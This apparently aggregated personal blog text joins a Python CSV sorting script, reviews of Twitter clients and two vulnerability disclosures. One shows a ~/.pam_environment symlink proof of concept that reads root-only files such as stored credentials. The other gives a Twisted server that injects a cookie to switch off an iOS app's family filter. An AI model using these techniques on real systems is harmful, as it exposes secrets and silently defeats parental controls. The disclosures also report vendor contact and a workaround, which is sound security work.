inside Habbie's mind

This script fixes the CSV up in a few ways:

• it puts a single quote character in front of all timestamp fields - without it, Numbers will interpret the dates and, for me, it is confused about day field vs. month field
• it sorts the CSV by start time, ascending instead of descending

Code: (download here)

#!/usr/bin/env python
import csv
import sys
import operator

r = csv.reader(sys.stdin)
rows=[]
for row in r:
        row[5] = "'%s" % row[5]
        row[6] = "'%s" % row[6]
        row[7] = "'%s" % row[7]
        rows.append(row)

rows = [rows[0]] + sorted(
       rows[1:],
       key=operator.itemgetter(5)
)

w = csv.writer(sys.stdout)
for row in rows:
        w.writerow(row)

• Nambu: lost DM support last week. No streaming. Often errors during refresh. Otherwise, best client ever.
• Twitter.app: looks like shit. Does not work with HyperDock. Can’t find the keyboard shortcut to switch accounts.
• Echofon: looks like utter shit. Multiple account support seems hackish.
• Kiwi: looks good but is extremely buggy. Frequently fails to load (or display) timelines or DMs at all.
• YoruFukurou: terrible name. Reasonable looks. Acceptable keyboard shortcuts. Streaming support. Multi-account support at least has working notifications. I’m sticking with YoruFukurou for now.

70 packages can be updated.
35 updates are security updates.

However, in the course of this investigation I noticed that /etc/update-motd.d is basically a bunch of shell scripts that get run as root on every ssh login by any user. Scary, no?

Remembering that being able to inject some environment variables was always a great way to break out of ‘restricted’ shells that were written in (ba)sh, I set out to look at methods of influencing the environment these scripts would be run in. .ssh/environment, .pam_environment and OpenSSH’s SendEnv all turned out to be smart enough to only do their work after update-motd was done, sadly. I was out of ideas.

The code of pam_env.so did tell me another interesting thing – ~/.pam_environment is opened and read as root, without any dropping of privileges. This suggested that symlinking it to some unreadable file (of the right format, i.e. consisting of VAR=value lines) would compromise the data in that file.

A proof of concept was simple enough (newline inserted because my blog layout is too narrow):

root@vps6001:~# cat /etc/env2
ENV2=bla
...
peter@vps6001:~$ ls -al .pam_environment 
lrwxrwxrwx 1 peter peter 9 May 12 22:13
                   .pam_environment -> /etc/env2
peter@vps6001:~$ ls -al /etc/env2
---------- 1 root root 9 May 12 22:13 /etc/env2
peter@vps6001:~$ set | grep -i env
ENV2=bla

Effective targets for this trick do exist. DirectAdmin (a commercial control panel) stores MySQL login information in a suitable file, and many daemons that support LDAP expect a password stored in a similar way. Also, base64-encoded files (like SSL and ssh keys) that happen to need padding such that they end in == expose their last line this way. I don’t know what the mathematical implications of having the last few bits of a private key are, but it can’t be good.

Some internet searching turned out that this issue was previously discovered by other people.

Ubuntu 10.04 and Debian 6 are still vulnerable to this issue. Debian has a report on file but has not acted on it yet. Ubuntu doesn’t seem to know at all.

I emailed security@ for both distributions, Debian responded within minutes pointing me to the report they already had. I’m waiting for a response from Ubuntu.

Workaround: add user_readenv=0 to every pam_env.so listing in /etc/pam.d.

The bigger implication however, is that injecting one cookie (family_filter=off) into your iPhone/iPad-application will fully disable the family filter for that client. This would be, I suspect, a violation of Apple App Store guidelines. Of course, if people do this for their own devices, nobody cares. However, this issue would allow a competent malicious third party (or a dedicated teenager ;)) to silently enable the viewing of adult material on a device that is expected to be family-safe.

Note that jailbreaking or similar hacks are not needed to exploit this issue. Hijacking traffic at the network level, or simply pointing the iPhone/iPad’s proxy configuration to a specifically prepared server, is enough.

(On a sidenote, the iPad/iPhone app uses an older REST API that does not conform to the current API docs and also does not use HTTPS, making this issue slightly easier to exploit).

Simple working example of such a specifically prepared server:

from twisted.web import server, resource
from twisted.internet import reactor

from twisted.python import log
import sys
log.startLogging(sys.stdout)

class Simple(resource.Resource):
    isLeaf = True
    def render_GET(self, request):
        request.addCookie(
            "family_filter",
            "off",
            path="/",
            expires="Tue, 24-Jan-2012 22:26:22 GMT"
        )
        return "{}"

site = server.Site(Simple())
reactor.listenTCP(8080, site)
reactor.run()

I doubt Dailymotion is the first or only iOS app that can be influenced by getting some cookies in. Will we see more of this?